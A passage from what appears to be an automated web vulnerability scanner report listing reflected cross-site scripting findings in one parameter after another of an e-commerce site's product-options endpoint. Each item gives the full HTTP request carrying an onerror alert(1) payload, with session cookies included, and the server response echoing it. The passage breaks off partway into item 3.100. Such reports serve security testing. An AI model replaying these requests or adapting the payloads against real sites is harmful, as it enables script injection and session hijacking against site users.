Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=62025a69<img%20src%3da%20onerror%3dalert(1)>60e211932b3&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 62025a69<img src=a onerror=alert(1)>60e211932b3 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:16:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:16:42 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 62025a69<img src=a onerror=alert(1)>60e211932b3 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.92. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue92 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue92 request parameter is copied into the HTML document as plain text between tags. The payload a35d0<img%20src%3da%20onerror%3dalert(1)>63093daffc2 was submitted in the buyForm3021_optionValue92 parameter. This input was echoed as a35d0<img src=a onerror=alert(1)>63093daffc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646a35d0<img%20src%3da%20onerror%3dalert(1)>63093daffc2&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 646a35d0<img src=a onerror=alert(1)>63093daffc2 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:15:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:15:42 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 646a35d0<img src=a onerror=alert(1)>63093daffc2 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.93. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue93 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue93 request parameter is copied into the HTML document as plain text between tags. The payload 3ca31<img%20src%3da%20onerror%3dalert(1)>c3f9fe35a94 was submitted in the buyForm3021_optionValue93 parameter. This input was echoed as 3ca31<img src=a onerror=alert(1)>c3f9fe35a94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=6683ca31<img%20src%3da%20onerror%3dalert(1)>c3f9fe35a94&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 6683ca31<img src=a onerror=alert(1)>c3f9fe35a94 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:18:49 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:18:49 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 6683ca31<img src=a onerror=alert(1)>c3f9fe35a94 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.94. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue94 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue94 request parameter is copied into the HTML document as plain text between tags. The payload bd121<img%20src%3da%20onerror%3dalert(1)>dd999491e54 was submitted in the buyForm3021_optionValue94 parameter. This input was echoed as bd121<img src=a onerror=alert(1)>dd999491e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689bd121<img%20src%3da%20onerror%3dalert(1)>dd999491e54&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021

Response

HTTP/1.1 500 Invalid data 689bd121<img src=a onerror=alert(1)>dd999491e54 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:20:50 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:20:49 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 689bd121<img src=a onerror=alert(1)>dd999491e54 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.95. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue95 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue95 request parameter is copied into the HTML document as plain text between tags. The payload 8e184<img%20src%3da%20onerror%3dalert(1)>d5082daa7fd was submitted in the buyForm3021_optionValue95 parameter. This input was echoed as 8e184<img src=a onerror=alert(1)>d5082daa7fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=7338e184<img%20src%3da%20onerror%3dalert(1)>d5082daa7fd&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_op
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 7338e184<img src=a onerror=alert(1)>d5082daa7fd for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:07:26 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:07:26 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 7338e184<img src=a onerror=alert(1)>d5082daa7fd for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.96. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue96 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue96 request parameter is copied into the HTML document as plain text between tags. The payload 40ff1<img%20src%3da%20onerror%3dalert(1)>6c082eb0082 was submitted in the buyForm3021_optionValue96 parameter. This input was echoed as 40ff1<img src=a onerror=alert(1)>6c082eb0082 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=74340ff1<img%20src%3da%20onerror%3dalert(1)>6c082eb0082&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_op
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 74340ff1<img src=a onerror=alert(1)>6c082eb0082 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:19:48 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:19:48 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 74340ff1<img src=a onerror=alert(1)>6c082eb0082 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.97. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue97 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue97 request parameter is copied into the HTML document as plain text between tags. The payload 2fbf5<img%20src%3da%20onerror%3dalert(1)>38934e0c95b was submitted in the buyForm3021_optionValue97 parameter. This input was echoed as 2fbf5<img src=a onerror=alert(1)>38934e0c95b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=7802fbf5<img%20src%3da%20onerror%3dalert(1)>38934e0c95b&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 7802fbf5<img src=a onerror=alert(1)>38934e0c95b for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:08:28 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:08:27 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 7802fbf5<img src=a onerror=alert(1)>38934e0c95b for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.98. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue98 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue98 request parameter is copied into the HTML document as plain text between tags. The payload 61958<img%20src%3da%20onerror%3dalert(1)>7a7fc952497 was submitted in the buyForm3021_optionValue98 parameter. This input was echoed as 61958<img src=a onerror=alert(1)>7a7fc952497 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ns=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=81461958<img%20src%3da%20onerror%3dalert(1)>7a7fc952497&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_opti
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 81461958<img src=a onerror=alert(1)>7a7fc952497 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:13:36 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:13:36 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 81461958<img src=a onerror=alert(1)>7a7fc952497 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.99. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue99 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue99 request parameter is copied into the HTML document as plain text between tags. The payload 3a9b7<img%20src%3da%20onerror%3dalert(1)>d450c3292d7 was submitted in the buyForm3021_optionValue99 parameter. This input was echoed as 3a9b7<img src=a onerror=alert(1)>d450c3292d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=8523a9b7<img%20src%3da%20onerror%3dalert(1)>d450c3292d7&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 8523a9b7<img src=a onerror=alert(1)>d450c3292d7 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:09:28 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:09:28 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 8523a9b7<img src=a onerror=alert(1)>d450c3292d7 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.100. http://www.munichmyway.com/templates/common/products/productProperties.cfm [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 598c4<img%20src%3da%20onerror%3dalert(1)>01f6b76535b6cd0b was submitted in the id parameter. This input was echoed as 598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes demonstration and delivery of the attack easier.

Request

